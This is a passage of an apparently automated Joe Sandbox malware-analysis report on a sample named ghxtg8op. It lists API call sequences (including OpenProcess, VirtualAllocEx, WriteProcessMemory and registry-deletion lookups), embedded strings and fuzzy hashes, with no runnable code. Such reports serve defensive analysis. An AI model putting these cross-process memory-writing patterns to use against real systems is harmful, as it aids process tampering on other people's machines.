                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: 83180ccc54f375eafc56812b283569bd35394dbb53ced3e91a2e33fb9f6f5375
                            • Instruction ID: b62d54ea837277c46a47a39a4a8f1b6ee8df85b62c227ee9124e069437032f77
                            • Opcode Fuzzy Hash: 83180ccc54f375eafc56812b283569bd35394dbb53ced3e91a2e33fb9f6f5375
                            • Instruction Fuzzy Hash: 0101AD30454306ABEB245B60ED4EFD677B9FB00B06F04426AA582E15E1DBF0A9489BB4
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: 1bf26fa438dcd476a34dd9a12346918d1810b36ad2db0e3147637f1a1d8da99b
                            • Instruction ID: 143c5834d4e991622666e3b5bafef88425384d4ef4d148965e2974d54396f78d
                            • Opcode Fuzzy Hash: 1bf26fa438dcd476a34dd9a12346918d1810b36ad2db0e3147637f1a1d8da99b
                            • Instruction Fuzzy Hash: 46F0FB3500070A9FDB155F56EC4CB993BA5A700726F08C235E869981F1C73289D9DF30
                            APIs
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D47A51: _memmove.LIBCMT ref: 00D47AAB
                            • __swprintf.LIBCMT ref: 00D52ECD
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D52D66
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 1943609520-557222456
                            • Opcode ID: 4a0d02bfe33b2b5f70b4813c08a01a9af856ca88c37803a258f943bd216f8c79
                            • Instruction ID: f732faafc4acdab7d1658926704a67bf71ac0a8f952760e713bbb96314aa929a
                            • Opcode Fuzzy Hash: 4a0d02bfe33b2b5f70b4813c08a01a9af856ca88c37803a258f943bd216f8c79
                            • Instruction Fuzzy Hash: D0913A711082019FCB14EF24D896D7FB7A4EF95714F04491DF8959B2A2EB20ED49CB72
                            APIs
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                            • CoInitialize.OLE32(00000000), ref: 00DAB9BB
                            • CoCreateInstance.OLE32(00DD2D6C,00000000,00000001,00DD2BDC,?), ref: 00DAB9D4
                            • CoUninitialize.OLE32 ref: 00DAB9F1
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                            • String ID: .lnk
                            • API String ID: 2126378814-24824748
                            • Opcode ID: dc8446524969845ab124699641b56097dc22ab1af1684e71e12a5d2ec103513d
                            • Instruction ID: af32b7d8f3d41fff5366c446fde8a7a2393b1b20904257d95f13432d49aa19e2
                            • Opcode Fuzzy Hash: dc8446524969845ab124699641b56097dc22ab1af1684e71e12a5d2ec103513d
                            • Instruction Fuzzy Hash: 66A169756043059FCB10DF15C494D6ABBE5FF8A324F048959F89A9B3A2CB31EC46CBA1
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00D650AD
                              • Part of subcall function 00D700F0: __87except.LIBCMT ref: 00D7012B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorHandling__87except__start
                            • String ID: pow
                            • API String ID: 2905807303-2276729525
                            • Opcode ID: c17eed7e9cef92dd042a3bcfedc24a527c07ddda8a7544c5eaec0ae399eb8daa
                            • Instruction ID: a567aaa837a4b4ae090923cfa50341d79f01d112bb9cb2c6a56c91726d2dbd47
                            • Opcode Fuzzy Hash: c17eed7e9cef92dd042a3bcfedc24a527c07ddda8a7544c5eaec0ae399eb8daa
                            • Instruction Fuzzy Hash: A3515921918702D7DB116728D80136E3F94DB41700F68C999E8D9C62EEFF38C9D49AB6
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memset$_memmove
                            • String ID: ERCP
                            • API String ID: 2532777613-1384759551
                            • Opcode ID: 9831a8977eacaae607b6ba541cf828328971fc06577aa5e586c980c621e7cf26
                            • Instruction ID: c660220350d45800b3651a01e05f27fe5424f64d4e83464ed66827de6e4417fe
                            • Opcode Fuzzy Hash: 9831a8977eacaae607b6ba541cf828328971fc06577aa5e586c980c621e7cf26
                            • Instruction Fuzzy Hash: CC518D70900709DBDF24CF65C8417AABBE4EF04315F68856AED4AC7250E770EA48CB60
                            APIs
                              • Part of subcall function 00DA14BC: WriteProcessMemory.KERNEL32 ref: 00DA14E6
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D9983F
                              • Part of subcall function 00DA1487: ReadProcessMemory.KERNEL32 ref: 00DA14B1
                              • Part of subcall function 00DA13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00DA1409
                              • Part of subcall function 00DA13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D9925A,00000034,?,?,00001004,00000000,00000000), ref: 00DA1419
                              • Part of subcall function 00DA13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D9925A,00000034,?,?,00001004,00000000,00000000), ref: 00DA142F
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D998AC
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D998F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            • Opcode ID: 1bc186675adcaf55cdbcfe7c696c184d884d5dd99ea94b30d8e13f4e3c75bb10
                            • Instruction ID: c59548cfff72188e16e60aea33bca3a31e5868ad2c2a4183cbc4c909095c58f4
                            • Opcode Fuzzy Hash: 1bc186675adcaf55cdbcfe7c696c184d884d5dd99ea94b30d8e13f4e3c75bb10
                            • Instruction Fuzzy Hash: 4D412D76900219BEDF10DFA8CC91ADEBBB8EB09300F044199FA55B7191DA716E45CBB0
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DC79DF
                            • GetWindowLongW.USER32 ref: 00DC79FC
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DC7A0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: 2d89635d4d073ca2b3c4ee6181f82134ed55c14306310fdadfcc7342a4027382
                            • Instruction ID: cb6af718981a759db8bebb608099a263b5995533adf68cda0497bcc1ddd94e0d
                            • Opcode Fuzzy Hash: 2d89635d4d073ca2b3c4ee6181f82134ed55c14306310fdadfcc7342a4027382
                            • Instruction Fuzzy Hash: 62317E31204606ABDB119F34CC45FEA77A9EB45324F244729F979E32E0DB31E9519B70
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DC7461
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DC7475
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC7499
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            • Opcode ID: 4cded8e7c70de46260cb8908aa5a3dbf2ddd51417db747b52d98cb0c2b38dc3b
                            • Instruction ID: 655f81ad24bfc566a2383d4505cd8a39428df5ba1cf52aa05fe60f8b98f8f14c
                            • Opcode Fuzzy Hash: 4cded8e7c70de46260cb8908aa5a3dbf2ddd51417db747b52d98cb0c2b38dc3b
                            • Instruction Fuzzy Hash: E221B13250421AAFDF158F64CC42FEA3B69EB48724F150218FE156B190DA75AC95DBB0
                            APIs
                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DC7C4A
                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DC7C58
                            • DestroyWindow.USER32 ref: 00DC7C5F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$DestroyWindow
                            • String ID: msctls_updown32
                            • API String ID: 4014797782-2298589950
                            • Opcode ID: cd8668fb5f2f54b3fbedfc6c6e0064c9b9352c07d49345cb7f5451bd9917c73a
                            • Instruction ID: 89cc5d1b8db31734759c0bd0e7f92d3f1c5a8ed10f2bc0cb4a151cff6a29c037
                            • Opcode Fuzzy Hash: cd8668fb5f2f54b3fbedfc6c6e0064c9b9352c07d49345cb7f5451bd9917c73a
                            • Instruction Fuzzy Hash: 9C217CB560420AAFDB10DF64DCC1EA737EDEB59364B144459FA059B3A1CB32EC518E70
                            APIs
                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DC6D3B
                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DC6D4B
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC6D70
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$MoveWindow
                            • String ID: Listbox
                            • API String ID: 3315199576-2633736733
                            • Opcode ID: 36aa85b8da6c059439896c44032ae41cc63d84a708e67b42a2136dce1eb3aa62
                            • Instruction ID: 318f036386579fa20d2117ffe9ba526e2ccb547967d8925af85907360ee93fae
                            • Opcode Fuzzy Hash: 36aa85b8da6c059439896c44032ae41cc63d84a708e67b42a2136dce1eb3aa62
                            • Instruction Fuzzy Hash: 2F218E32610119BFEF118F54CC85FAB3BAAEF89760F058129FA459B1A0CA71DC519BB0
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DC7772
                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DC7787
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DC7794
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: 24b79f1d1c77923fa6c47d9e732d69f451e1c15a79541d76739b593aef236789
                            • Instruction ID: 8d7716425162dc5a9ee75b089e42910a8a09beff330d6cb40e139bc3f18cb5b2
                            • Opcode Fuzzy Hash: 24b79f1d1c77923fa6c47d9e732d69f451e1c15a79541d76739b593aef236789
                            • Instruction Fuzzy Hash: FE11E27264020ABAEB105F61CC01FE77B69EB88B64F11411CF641A20D0C272E8518B30
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D44C11
                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44C23
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-3689287502
                            • Opcode ID: c2e8e2c60a73c894bb20448d50067089a1ffd29f1f8624ed30d09d88dfb66e14
                            • Instruction ID: dd6c1dd9f8d251b2fa6c713124a944824e7673d9d97c1234bd5f21a4acbb6da9
                            • Opcode Fuzzy Hash: c2e8e2c60a73c894bb20448d50067089a1ffd29f1f8624ed30d09d88dfb66e14
                            • Instruction Fuzzy Hash: 11D0EC35911713CFD7205F71D948A46BAD6AF09351B1DC8399486D6250E6B0D8848670
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D44C44
                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D44C56
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-1355242751
                            • Opcode ID: 0134ab064abdf8e9703ebc20f4e22b27fef5de2d25d964b5fb74118ed45a9fdb
                            • Instruction ID: 5c2aa1a541b8a7330b77aa72ffbb01e5f31273470daadb099a89765e954ebce8
                            • Opcode Fuzzy Hash: 0134ab064abdf8e9703ebc20f4e22b27fef5de2d25d964b5fb74118ed45a9fdb
                            • Instruction Fuzzy Hash: FAD01731510723CFD7209F31D948B9AB6E6AF05351B29C83E9596D6264E770D8C4CA70
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DC0DF5
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DC0E07
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: 93e5d6bcdfc97cf74fd86ff6213c2b4423394929dd604ec59baead663e07d35e
                            • Instruction ID: 67c56790f341257c127a47ac1b2c39be503d7cc4a5665f6e515c907cbe893385
                            • Opcode Fuzzy Hash: 93e5d6bcdfc97cf74fd86ff6213c2b4423394929dd604ec59baead663e07d35e
                            • Instruction Fuzzy Hash: 88D01271950717CFD7205F75C808B96B6D9AF04351F19CC3DA585D6251D6B0D490C670
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00DB90EE
                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,00DCF910), ref: 00DB9100
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetModuleHandleExW$kernel32.dll
                            • API String ID: 2574300362-199464113
                            • Opcode ID: 9551c2c44b54e5f328f6ff3d3057b09fd597bf65e35b84e0f2466c220b899fcb
                            • Instruction ID: 6c4166831c44a32be133e5895493f2e1a932430a173966b72eeb9bf52adb696f
                            • Opcode Fuzzy Hash: 9551c2c44b54e5f328f6ff3d3057b09fd597bf65e35b84e0f2466c220b899fcb
                            • Instruction Fuzzy Hash: 21D01235510713CFD7209F35D818A86B6D6AF05391B1AC83D9586D6650E770C880D670
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LocalTime__swprintf
                            • String ID: %.3d$WIN_XPe
                            • API String ID: 2070861257-2409531811
                            • Opcode ID: 4b9ccd58903ca74a2d719f417b960e9191e370f18f9f6753d14a896bea150d22
                            • Instruction ID: 9b31c22a43f37c3e8452740a16b05155259434aa7cfae80e0aa782190e310916
                            • Opcode Fuzzy Hash: 4b9ccd58903ca74a2d719f417b960e9191e370f18f9f6753d14a896bea150d22
                            • Instruction Fuzzy Hash: 90D012B5805219EBC700A7909C88CF9737CA718301F140566B546D2050E261C759D735
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d918bd8a6a90871f8eac9e91b6786cffbcb97bfc62810bad854617ad1562e29d
                            • Instruction ID: e7083e2a7f4081afa9576c322b8a60ca6537fcd1d240db01b4945225f563476f
                            • Opcode Fuzzy Hash: d918bd8a6a90871f8eac9e91b6786cffbcb97bfc62810bad854617ad1562e29d
                            • Instruction Fuzzy Hash: 1FC16E74A14216EFCF14CFA8C884EAEBBB5FF48714B158598E805EB251D730ED81DBA0
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 00DBE0BE
                            • CharLowerBuffW.USER32(?,?), ref: 00DBE101
                              • Part of subcall function 00DBD7A5: CharLowerBuffW.USER32(?,?), ref: 00DBD7C5
                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DBE301
                            • _memmove.LIBCMT ref: 00DBE314
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharLower$AllocVirtual_memmove
                            • String ID:
                            • API String ID: 3659485706-0
                            • Opcode ID: bedfadb4d56fbe89e17b22867a9377582d17b02bdea6a4ea4ca07f6befa63e8d
                            • Instruction ID: c11e1e36e58d32113e62c908bb60b3b9bd65e269652f5092f50ada7f6baeaa30
                            • Opcode Fuzzy Hash: bedfadb4d56fbe89e17b22867a9377582d17b02bdea6a4ea4ca07f6befa63e8d
                            • Instruction Fuzzy Hash: BAC11671604301DFC714DF28C4809AABBE4FF89754F14896EF89A9B351D731E946CBA1
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 00DB80C3
                            • CoUninitialize.OLE32 ref: 00DB80CE
                              • Part of subcall function 00D9D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00D9D5D4
